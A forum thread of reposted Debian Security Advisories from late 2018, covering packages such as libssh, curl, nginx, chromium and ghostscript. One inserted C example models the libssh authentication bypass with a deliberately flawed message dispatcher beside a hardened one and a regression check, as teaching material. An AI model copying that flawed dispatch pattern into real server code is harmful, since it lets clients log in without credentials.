CVE ID         : CVE-2018-16056 CVE-2018-16057 CVE-2018-16058

Multiple vulnerabilities have been discovered in Wireshark, a network
protocol analyzer which could result in denial of service or the
execution of arbitrary code.

For the stable distribution (stretch), these problems have been fixed in
version 2.6.3-1~deb9u1. This update upgrades Wireshark to the 2.6.x
release branch; future security upgrades will be based on this series.

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4316-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
October 12, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : imagemagick
CVE ID         : CVE-2018-16412 CVE-2018-16413 CVE-2018-16642 CVE-2018-16644
                 CVE-2018-16645

This update fixes several vulnerabilities in Imagemagick, a graphical
software suite. Various memory handling problems or incomplete input
sanitising have been found in the coders for BMP, DIB, PICT, DCM, CUT
and PSD.

For the stable distribution (stretch), these problems have been fixed in
version 8:6.9.7.4+dfsg-11+deb9u6.

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4317-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
October 14, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : otrs2
CVE ID         : CVE-2018-14593 CVE-2018-16586 CVE-2018-16587

Three vulnerabilities were discovered in the Open Ticket Request System
which could result in privilege escalation or denial of service.

For the stable distribution (stretch), these problems have been fixed in
version 5.0.16-1+deb9u6.

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4318-1                   security@debian.org
https://www.debian.org/security/                     Salvatore Bonaccorso
October 15, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : moin
CVE ID         : CVE-2017-5934
Debian Bug     : 910776

Nitin Venkatesh discovered a cross-site scripting vulnerability in moin,
a Python clone of WikiWiki. A remote attacker can conduct cross-site
scripting attacks via the GUI editor's link dialogue. This only affects
installations which have set up fckeditor (not enabled by default).

For the stable distribution (stretch), this problem has been fixed in
version 1.9.9-1+deb9u1.

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4319-1                   security@debian.org
https://www.debian.org/security/                     Salvatore Bonaccorso
October 15, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : spice
CVE ID         : CVE-2018-10873
Debian Bug     : 906315

Frediano Ziglio reported a missing check in the script to generate
demarshalling code in the SPICE protocol client and server library. The
generated demarshalling code is prone to multiple buffer overflows. An
authenticated attacker can take advantage of this flaw to cause a denial
of service (spice server crash), or possibly, execute arbitrary code.

For the stable distribution (stretch), this problem has been fixed in
version 0.12.8-2.1+deb9u2.

#1489 sunrat (Thread Kahuna, Forum Moderators, 5,696 posts)

Posted 19 October 2018 - 07:51 AM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4320-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
October 16, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : asterisk
CVE ID         : CVE-2018-7284 CVE-2018-7286 CVE-2018-12227 CVE-2018-17281
Debian Bug     : 891227 891228 902954 909554

Multiple vulnerabilities have been discovered in Asterisk, an open source
PBX and telephony toolkit, which may result in denial of service or
information disclosure.

For the stable distribution (stretch), these problems have been fixed in
version 1:13.14.1~dfsg-2+deb9u4.

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4321-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
October 16, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : graphicsmagick
CVE ID         : CVE-2017-10794 CVE-2017-10799 CVE-2017-10800 CVE-2017-11102
                 CVE-2017-11139 CVE-2017-11140 CVE-2017-11403 CVE-2017-11636
                 CVE-2017-11637 CVE-2017-11638 CVE-2017-11641 CVE-2017-11642
                 CVE-2017-11643 CVE-2017-11722 CVE-2017-12935 CVE-2017-12936
                 CVE-2017-12937 CVE-2017-13063 CVE-2017-13064 CVE-2017-13065
                 CVE-2017-13134 CVE-2017-13737 CVE-2017-13775 CVE-2017-13776
                 CVE-2017-13777 CVE-2017-14314 CVE-2017-14504 CVE-2017-14733
                 CVE-2017-14994 CVE-2017-14997 CVE-2017-15238 CVE-2017-15277
                 CVE-2017-15930 CVE-2017-16352 CVE-2017-16353 CVE-2017-16545
                 CVE-2017-16547 CVE-2017-16669 CVE-2017-17498 CVE-2017-17500
                 CVE-2017-17501 CVE-2017-17502 CVE-2017-17503 CVE-2017-17782
                 CVE-2017-17783 CVE-2017-17912 CVE-2017-17913 CVE-2017-17915
                 CVE-2017-18219 CVE-2017-18220 CVE-2017-18229 CVE-2017-18230
                 CVE-2017-18231 CVE-2018-5685 CVE-2018-6799 CVE-2018-9018

Several vulnerabilities have been discovered in GraphicsMagick, a set of
command-line applications to manipulate image files, which could result
in denial of service or the execution of arbitrary code if malformed
image files are processed.

For the stable distribution (stretch), these problems have been fixed in
version 1.3.30+hg15796-1~deb9u1.

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4322-1                   security@debian.org
https://www.debian.org/security/                     Salvatore Bonaccorso
October 17, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : libssh
CVE ID         : CVE-2018-10933
Debian Bug     : 911149

Peter Winter-Smith of NCC Group discovered that libssh, a tiny C SSH
library, contains an authentication bypass vulnerability in the server
code. An attacker can take advantage of this flaw to successfully
authenticate without any credentials by presenting the server an
SSH2_MSG_USERAUTH_SUCCESS message in place of the
SSH2_MSG_USERAUTH_REQUEST message which the server would expect to
initiate authentication.

For the stable distribution (stretch), this problem has been fixed in
version 0.7.3-2+deb9u1.
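The advisory above describes a message-dispatch flaw: the server acted on a message type that only a server may send. The following is an added example, not libssh code: a toy model of server-side userauth dispatch showing the flawed routing beside a hardened form. The message numbers are the ones RFC 4252 assigns; the session struct, the handlers, the credential check and the "alice" credentials are all constructed for the example.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* SSH userauth message numbers from RFC 4252 (names as used in the advisory). */
#define SSH2_MSG_USERAUTH_REQUEST 50
#define SSH2_MSG_USERAUTH_FAILURE 51
#define SSH2_MSG_USERAUTH_SUCCESS 52

/* Return value used by both dispatchers for "protocol violation, disconnect". */
#define DISPATCH_DISCONNECT (-1)

struct session {
    bool authenticated;
    const char *user;
};

/* Hypothetical credential check; only this constructed pair is accepted. */
static bool verify_credentials(const char *user, const char *secret) {
    return strcmp(user, "alice") == 0 && strcmp(secret, "correct-horse") == 0;
}

/* Handles a USERAUTH_REQUEST: the only path that should ever authenticate. */
static int handle_userauth_request(struct session *s, const char *user,
                                   const char *secret) {
    if (verify_credentials(user, secret)) {
        s->authenticated = true;
        s->user = user;
        return SSH2_MSG_USERAUTH_SUCCESS; /* the reply the server sends back */
    }
    return SSH2_MSG_USERAUTH_FAILURE;
}

/* Flawed dispatch (a model of the bug class in the advisory): every known
 * message number is routed to a handler, including the one that records a
 * successful authentication, which should only ever run when the server
 * itself emits USERAUTH_SUCCESS. A peer sending message 52 instead of 50
 * is therefore marked as logged in without any credentials being checked. */
static int dispatch_flawed(struct session *s, int msg_type,
                           const char *user, const char *secret) {
    switch (msg_type) {
    case SSH2_MSG_USERAUTH_REQUEST:
        return handle_userauth_request(s, user, secret);
    case SSH2_MSG_USERAUTH_SUCCESS:
        s->authenticated = true;   /* bug: reachable for an inbound packet */
        s->user = user;
        return SSH2_MSG_USERAUTH_SUCCESS;
    default:
        return DISPATCH_DISCONNECT;
    }
}

/* Hardened dispatch: during userauth a server accepts only client-to-server
 * message types, so the SUCCESS/FAILURE numbers (server-to-client only) are
 * rejected before any handler runs. The authenticated flag can then only be
 * set by handle_userauth_request() after verify_credentials() succeeds. */
static bool client_may_send_in_userauth(int msg_type) {
    return msg_type == SSH2_MSG_USERAUTH_REQUEST;
}

static int dispatch_hardened(struct session *s, int msg_type,
                             const char *user, const char *secret) {
    if (!client_may_send_in_userauth(msg_type))
        return DISPATCH_DISCONNECT;
    return handle_userauth_request(s, user, secret);
}

typedef int (*dispatch_fn)(struct session *, int, const char *, const char *);

/* Regression check: does an unexpected USERAUTH_SUCCESS from the peer leave
 * the session authenticated under the given dispatcher? */
static bool forged_success_authenticates(dispatch_fn dispatch) {
    struct session s = { false, NULL };
    dispatch(&s, SSH2_MSG_USERAUTH_SUCCESS, "nobody", "");
    return s.authenticated;
}

int main(void) {
    printf("flawed dispatch:   peer-sent SUCCESS authenticates = %d\n",
           forged_success_authenticates(dispatch_flawed));
    printf("hardened dispatch: peer-sent SUCCESS authenticates = %d\n",
           forged_success_authenticates(dispatch_hardened));
    return 0;
}
```

The same direction check is worth applying to every phase of a protocol state machine, not just userauth: each state should whitelist the message types the peer is allowed to send in it.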

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4323-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
October 18, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : drupal7
CVE ID         : not yet available

Two vulnerabilities were found in Drupal, a fully-featured content
management framework, which could result in arbitrary code execution or
an open redirect. For additional information, please refer to the
upstream advisory at https://www.drupal.o...a-core-2018-006

For the stable distribution (stretch), this problem has been fixed in
version 7.52-2+deb9u5.

#1490 sunrat

Posted 24 October 2018 - 08:12 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4324-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
October 24, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : firefox-esr
CVE ID         : CVE-2018-12389 CVE-2018-12390 CVE-2018-12392
                 CVE-2018-12393 CVE-2018-12395 CVE-2018-12396
                 CVE-2018-12397

Multiple security issues have been found in the Mozilla Firefox web
browser, which could result in the execution of arbitrary code,
privilege escalation or information disclosure.

For the stable distribution (stretch), these problems have been fixed in
version 60.3.0esr-1~deb9u1.

#1491 sunrat

Posted 25 October 2018 - 06:35 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4325-1                   security@debian.org
https://www.debian.org/security/                       Sebastien Delafond
October 25, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : mosquitto
CVE ID         : CVE-2017-7651 CVE-2017-7652 CVE-2017-7653 CVE-2017-7654
Debian Bug     : 911265 911266

It was discovered that mosquitto, an MQTT broker, was vulnerable to
remote denial-of-service attacks that could be mounted using various
vectors.

For the stable distribution (stretch), these problems have been fixed in
version 1.4.10-3+deb9u2.

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4326-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
October 25, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : openjdk-8
CVE ID         : CVE-2018-3136 CVE-2018-3139 CVE-2018-3149 CVE-2018-3169
                 CVE-2018-3180 CVE-2018-3183 CVE-2018-3214

Several vulnerabilities have been discovered in OpenJDK, an
implementation of the Oracle Java platform, resulting in denial of
service, sandbox bypass, incomplete TLS identity verification,
information disclosure or the execution of arbitrary code.

For the stable distribution (stretch), these problems have been fixed in
version 8u181-b13-2~deb9u1.

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4327-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
October 25, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : thunderbird
CVE ID         : CVE-2017-16541 CVE-2018-12376 CVE-2018-12377 CVE-2018-12378
                 CVE-2018-12379 CVE-2018-12383 CVE-2018-12385

Multiple security issues have been found in Thunderbird: Multiple memory
safety errors and use-after-frees may lead to the execution of arbitrary
code or denial of service.

For the stable distribution (stretch), these problems have been fixed in
version 1:60.2.1-2~deb9u1.

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4328-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
October 25, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : xorg-server
CVE ID         : CVE-2018-14665

Narendra Shinde discovered that incorrect command-line parameter
validation in the Xorg X server may result in arbitrary file overwrite,
which can result in privilege escalation.

For the stable distribution (stretch), this problem has been fixed in
version 2:1.19.2-1+deb9u4.

#1492 sunrat

Posted 28 October 2018 - 08:05 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4321-2                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
October 28, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : graphicsmagick

The update of GraphicsMagick in DSA-4321-1 introduced a change in the
handling of case-sensitivity in an internal API function which could
affect some code built against the GraphicsMagick libraries. This update
restores the previous behaviour.

For the stable distribution (stretch), these problems have been fixed in
version 1.3.30+hg15796-1~deb9u2.

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4329-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
October 28, 2018                      https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : teeworlds
CVE ID         : CVE-2018-18541

It was discovered that incorrect connection setup in the server for
Teeworlds, an online multi-player platform 2D shooter, could result in
denial of service via forged connection packets (rendering all game
server slots occupied).

For the stable distribution (stretch), this problem has been fixed in
version 0.6.5+dfsg-1~deb9u1.

#1493 sunrat

Posted 02 November 2018 - 07:30 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4330-1                   security@debian.org
https://www.debian.org/security/                          Michael Gilbert
November 02, 2018                     https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : chromium-browser
CVE ID         : CVE-2018-5179 CVE-2018-17462 CVE-2018-17463 CVE-2018-17464
                 CVE-2018-17465 CVE-2018-17466 CVE-2018-17467 CVE-2018-17468
                 CVE-2018-17469 CVE-2018-17470 CVE-2018-17471 CVE-2018-17473
                 CVE-2018-17474 CVE-2018-17475 CVE-2018-17476 CVE-2018-17477

Several vulnerabilities have been discovered in the chromium web browser.

CVE-2018-5179

    Yannic Boneberger discovered an error in the ServiceWorker implementation.

CVE-2018-17462

    Ned Williamson and Niklas Baumstark discovered a way to escape the sandbox.

CVE-2018-17463

    Ned Williamson and Niklas Baumstark discovered a remote code execution
    issue in the v8 javascript library.

CVE-2018-17464

    xisigr discovered a URL spoofing issue.

CVE-2018-17465

    Lin Zuojian discovered a use-after-free issue in the v8 javascript
    library.

CVE-2018-17466

    Omair discovered a memory corruption issue in the angle library.

CVE-2018-17467

    Khalil Zhani discovered a URL spoofing issue.

CVE-2018-17468

    Jams Lee discovered an information disclosure issue.

CVE-2018-17469

    Zhen Zhou discovered a buffer overflow issue in the pdfium library.

CVE-2018-17470

    Zhe Jin discovered a memory corruption issue in the GPU backend
    implementation.

CVE-2018-17471

    Lnyas Zhang discovered an issue with the full screen user interface.

CVE-2018-17473

    Khalil Zhani discovered a URL spoofing issue.

CVE-2018-17474

    Zhe Jin discovered a use-after-free issue.

CVE-2018-17475

    Vladimir Metnew discovered a URL spoofing issue.

CVE-2018-17476

    Khalil Zhani discovered an issue with the full screen user interface.

CVE-2018-17477

    Aaron Muir Hamilton discovered a user interface spoofing issue in the
    extensions pane.

This update also fixes a buffer overflow in the embedded lcms library included
with chromium.

For the stable distribution (stretch), these problems have been fixed in
version 70.0.3538.67-1~deb9u1.

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4331-1                   security@debian.org
https://www.debian.org/security/                       Alessandro Ghedini
November 02, 2018                     https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : curl
CVE ID         : CVE-2018-16839 CVE-2018-16842

Two vulnerabilities were discovered in cURL, a URL transfer library.

CVE-2018-16839

    Harry Sintonen discovered that, on systems with a 32 bit size_t, an
    integer overflow would be triggered when a SASL user name longer
    than 2GB is used. This would in turn cause a very small buffer to be
    allocated instead of the intended very huge one, which would trigger
    a heap buffer overflow when the buffer is used.

CVE-2018-16842

    Brian Carpenter discovered that the logic in the curl tool to wrap
    error messages at 80 columns is flawed, leading to a read buffer
    overflow if a single word in the message is itself longer than 80
    bytes.

For the stable distribution (stretch), these problems have been fixed in
version 7.52.1-5+deb9u8.

#1494 sunrat

Posted 03 November 2018 - 07:10 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4332-1                   security@debian.org
https://www.debian.org/security/                     Salvatore Bonaccorso
November 03, 2018                     https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : ruby2.3
CVE ID         : CVE-2018-16395 CVE-2018-16396

Several vulnerabilities have been discovered in the interpreter for the
Ruby language. The Common Vulnerabilities and Exposures project
identifies the following problems:

CVE-2018-16395

    Tyler Eckstein reported that the equality check of
    OpenSSL::X509::Name could return true for non-equal objects. If a
    malicious X.509 certificate is passed to compare with an existing
    certificate, there is a possibility to be judged incorrectly that
    they are equal.

CVE-2018-16396

    Chris Seaton discovered that tainted flags are not propagated in
    Array#pack and String#unpack with some directives.

For the stable distribution (stretch), these problems have been fixed in
version 2.3.3-1+deb9u4.

#1495 sunrat

Posted 04 November 2018 - 06:51 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4333-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
November 04, 2018                     https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : icecast2
CVE ID         : CVE-2018-18820

Nick Rolfe discovered multiple buffer overflows in the Icecast multimedia
streaming server which could result in the execution of arbitrary code.

For the stable distribution (stretch), this problem has been fixed in
version 2.4.2-1+deb9u1.

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4334-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
November 04, 2018                     https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : mupdf
CVE ID         : CVE-2017-17866 CVE-2018-5686 CVE-2018-6187 CVE-2018-6192
                 CVE-2018-1000037 CVE-2018-1000040

Multiple vulnerabilities were discovered in MuPDF, a PDF, XPS, and e-book
viewer which could result in denial of service or the execution of
arbitrary code if malformed documents are opened.

For the stable distribution (stretch), these problems have been fixed in
version 1.9a+ds1-4+deb9u4.

#1496 sunrat

Posted 08 November 2018 - 06:48 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4335-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
November 08, 2018                     https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : nginx
CVE ID         : CVE-2018-16843 CVE-2018-16844 CVE-2018-16845

Three vulnerabilities were discovered in Nginx, a high-performance web
and reverse proxy server, which could result in denial of service in
processing HTTP/2 (via excessive memory/CPU usage) or server memory
disclosure in the ngx_http_mp4_module module (used for server-side MP4
streaming).

For the stable distribution (stretch), these problems have been fixed in
version 1.10.3-1+deb9u2.

#1497 sunrat

Posted 12 November 2018 - 12:15 AM

------------------------------------------------------------------------
The Debian Project                               https://www.debian.org/
Updated Debian 9: 9.6 released                          press@debian.org
November 10th, 2018            https://www.debian.o...s/2018/20181110
------------------------------------------------------------------------


The Debian project is pleased to announce the sixth update of its stable
distribution Debian 9 (codename "stretch"). This point release mainly
adds corrections for security issues, along with a few adjustments for
serious problems. Security advisories have already been published
separately and are referenced where available.

Please note that the point release does not constitute a new version of
Debian 9 but only updates some of the packages included. There is no
need to throw away old "stretch" media. After installation, packages can
be upgraded to the current versions using an up-to-date Debian mirror.

Those who frequently install updates from security.debian.org won't have
to update many packages, and most such updates are included in the point
release.

New installation images will be available soon at the regular locations.

Upgrading an existing installation to this revision can be achieved by
pointing the package management system at one of Debian's many HTTP
mirrors. A comprehensive list of mirrors is available at:

https://www.debian.org/mirror/list

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4336-1                   security@debian.org
https://www.debian.org/security/                     Salvatore Bonaccorso
November 10, 2018                     https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : ghostscript
CVE ID         : CVE-2018-11645 CVE-2018-17961 CVE-2018-18073 CVE-2018-18284
Debian Bug     : 910678 910758 911175

Several vulnerabilities were discovered in Ghostscript, the GPL
PostScript/PDF interpreter, which may result in denial of service,
disclosure of existence and size of arbitrary files, or the execution of
arbitrary code if a malformed Postscript file is processed (despite the
dSAFER sandbox being enabled).

This update rebases ghostscript for stretch to the upstream version 9.25
which includes additional non-security related changes.

For the stable distribution (stretch), these problems have been fixed in
version 9.25~dfsg-0+deb9u1.

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4337-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
November 10, 2018                     https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : thunderbird
CVE ID         : CVE-2018-12389 CVE-2018-12390 CVE-2018-12392
                 CVE-2018-12393

Multiple security issues have been found in Thunderbird: Multiple memory
safety errors may lead to the execution of arbitrary code or denial of
service.

For the stable distribution (stretch), these problems have been fixed in
version 1:60.3.0-1~deb9u1.

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4338-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
November 11, 2018                     https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : qemu
CVE ID         : CVE-2018-10839 CVE-2018-17962 CVE-2018-17963
Debian Bug     : 908682 910431 911468 911469

Integer overflows in the processing of packets in network cards emulated
by QEMU, a fast processor emulator, could result in denial of service.

In addition this update backports support to passthrough the new CPU
features added in the intel-microcode update shipped in DSA 4273 to
x86-based guests.

For the stable distribution (stretch), these problems have been fixed in
version 1:2.8+dfsg-6+deb9u5.

#1498 sunrat

Posted 13 November 2018 - 07:13 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4339-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
November 13, 2018                     https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : ceph
CVE ID         : CVE-2017-7519 CVE-2018-1086 CVE-2018-1128 CVE-2018-1129

Multiple vulnerabilities were discovered in Ceph, a distributed storage
and file system: The cephx authentication protocol was susceptible to
replay attacks and calculated signatures incorrectly, "ceph mon" did not
validate capabilities for pool operations (resulting in potential
corruption or deletion of snapshot images) and a format string
vulnerability in libradosstriper could result in denial of service.

For the stable distribution (stretch), these problems have been fixed in
version 10.2.11-1.

#1499 sunrat

Posted Yesterday, 06:40 PM

- -------------------------------------------------------------------------
Debian Security Advisory DSA-4340-1                   security@debian.org
https://www.debian.org/security/                          Michael Gilbert
November 18, 2018                     https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : chromium-browser
CVE ID         : CVE-2018-17478

An out-of-bounds memory access issue was discovered in chromium's
v8 javascript library by cloudfuzzer.

This update also fixes two problems introduced by the previous security
upload. Support for arm64 has been restored and gconf-service is no longer
a package dependency.

For the stable distribution (stretch), this problem has been fixed in
version 70.0.3538.102-1~deb9u1.
